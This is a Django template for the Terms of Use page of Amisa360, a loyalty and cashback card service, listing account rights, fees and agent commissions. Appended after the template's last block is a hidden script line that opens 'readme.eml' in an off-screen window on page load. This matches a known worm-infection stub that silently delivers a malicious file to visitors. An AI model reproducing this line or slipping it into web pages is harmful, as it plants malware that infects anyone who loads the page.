{% extends 'Home/base.html' %}

{% load static %}


{% block title %}
	<title>Terms of Use</title>
{% endblock %}


{% block page_header %}

  <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <div class="content-header">
      <div class="container-fluid">
        <div class="row mb-2">
          <div class="col-sm-6">
            <h1 class="m-0 text-dark">Terms of Use</h1>
          </div><!-- /.col -->
          <div class="col-sm-6">
            <ol class="breadcrumb float-sm-right">
              <li class="breadcrumb-item"><a href="{% url 'Home:terms_of_use' %}">Terms of Use</a></li>
              <li class="breadcrumb-item active">Terms of Use</li>
            </ol>
          </div><!-- /.col -->
        </div><!-- /.row -->
      </div><!-- /.container-fluid -->
    </div>
    <!-- /.content-header -->
{% endblock %}


{% block main_content %}

{% endblock %}


{% block content %}

  <div class="row">
    <div class="col-md">
      <div class="card callout callout-info">
        <div class="card-header">
          <h3 class="card-title">
            <i class="fas fa-info"></i>
            Terms of Use
          </h3>
        </div>
        <div class="card-body">
          <div class="modal fade" id="aboutUS">
            <div class="modal-dialog modal-lg">
              <div class="modal-content">
                <div class="modal-header">
                  <h4 class="modal-title">Amisa</h4>
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                  </button>
                </div>
                <div class="modal-body">
                  <div class="card">
                    <div class="card-header">
                      <div class="card-title">
                        <h4>About Us</h4>
                      </div>
                    </div>
                    <div class="card-body">
                      <p>
                        Amisa360 is a loyalty company that innovate services on how customers make purchases in order to increase the level of sales and Profit margin of a participating business outlets, providing a means of cashback solutions for both new and existing customers using AMISACARD(s).
                      </p>
                      <p>
                        Customers/clients can contact us for business deals, partnership, purchases, sponsorship, support, enquiry etc.
                      </p>
                    </div>
                    <div class="card-footer">
                      <p>Office:</p>
                      <p>Call:</p>
                      <p>WhatsApp:</p>
                      <p>E-Mail: amisatechnologies@gmail.com</p>
                      <p>Thanks for being part of Amisa360 community.</p>
                    </div>
                </div>
                <div class="modal-footer justify-content-between">
                  <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                </div>
                </div>
              </div>
            </div>
          </div>
          <ul>
            <li>Our Terms of Services
              <ul>
                <li>
                  Welcome to amisa.com.ng ! The Amisa360, is a profit making organization that intended to increase the level of sales and profit margin of participating business outlets, providing means of cashback solutions for both new and existing customers using AMISACARD(s).
                </li>
              </ul>
            </li>
            <li>Overview
              <ul>
                <li>
                  These terms of use tells users ("you" or "your") about our loyalty services in the redemption platform (amisacb.com), our relationship to users, right and responsibilities that guide us both.
                </li>
              </ul>
            </li>
            <li>
              <ul>
                By clicking accept that means you warrant and agree that:
              </ul>
            </li>
            <li>Part A
              <ul>
                <li>
                  <li>We are allow to investigate your account for terms compliance, record purpose and security reasons.</li>
                  <li>We should not process any transactions without you requesting and reaching its requirements.</li>
                  <li>We have access to your registration details.</li>
                  <li>We have right to terminate your account incase of any fraudulent acts or misuse of our services.</li>
                  <li>We have right to terminate or reversed any processed transactions in not abiding to our terms terms.</li>
                  <li>We have right not to accept any transactions for not reaching it's requirements.</li>
                  <li>We have right to accept or decline any transactions inline with its requirements.</li>
                  <li>We alone have the right to access and manage the redemption platform.</li>
                  <li>We have the right to be releasing terms and conditions from time to time.</li>
                  <li>We have the right to charge you based on your transactions on the platform.</li>
                  <li>We charge 100% for user customers and 150% for user redemption agents accounts in which is amounted to whatever the banks will charge us as our charges for savings withdrawal.</li>
                  <li>We have the right to terminate any accounts that has been dormant for 1 year.</li>
                  <li>We may be providing you with notices, including those regarding changes of terms, transactions details and other informations.</li>
                  <li>We have the right to accept or decline your registration.</informations.>
                  <li>We have the right to ask and know your registration and other transactions details on the platform.</li>
                  <li>We are not allow to trade your details.</li>
                  <li>We have the right to take any decision if found breaching the terms of use by you.</li>
                  <li>We have the right to pay all service commission at the end of every months to agents.</li>
                  <li>We charge UCC = 0.08 ×P to user customers and ACC = 0.12 ×P as redemption charges.</li>
                </li>
              </ul>
            </li>
            <li>Part B
              <ul>
                <li>
                  <li>You are responsible for your own actions on the platform.</li>
                  <li>You are responsible for safeguarding your own password.</li>
                  <li>You can stop using our services and terminate your account, if necessary at any time.</li>
                  <li>You have right to perform any transactions that are listed on the platform but will only be processed after reaching its requirements with your consent.</li>
                  <li>You are entitle for a commission of N50 every months ending as an agent which based on your performance.</li>
                  <li>As an agent you are allow to charge customers TC = 0.12 ×P ×2.8 including ACC of the total price of cards they brought for redemption.</li>
                  <li>As an agent you are allow to rendered the accepted services to customers.</li>
                  <li>As an agent you are allow to set operationan vision, mission, and goals in your agent office.</li>
                </li>
              </ul>
            </li>
            <li>Part C
              <ul>
                <li>
                  <li>This terms of use serves as guide for both parties involved in the platform.</li>
                  <li>The platform accept and recognize only AMISACARD(s)</li>
                  <li>In any events of dispute, disagreement or misunderstanding kindly seek resolution through the customer care contact.</li>
                  <li>These terms of use are only agreement between us and you.</li>
                  <li>These terms of use do not create an employment, agency, partnership or joint venture relationship between us and you.</li>
                  <li>If there is any disagreement between these terms of use and a signed written agreement between us and you, the signed agreement will prevail and take control over these terms of use.</li>
                </li>
              </ul>
            </li>
          </ul>
        </div>
        <div class="card-footer">
          <p>Thanks for being part of AMISA community.</p>
        </div>
      </div>
    </div>
  </div>

{% endblock %}

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> 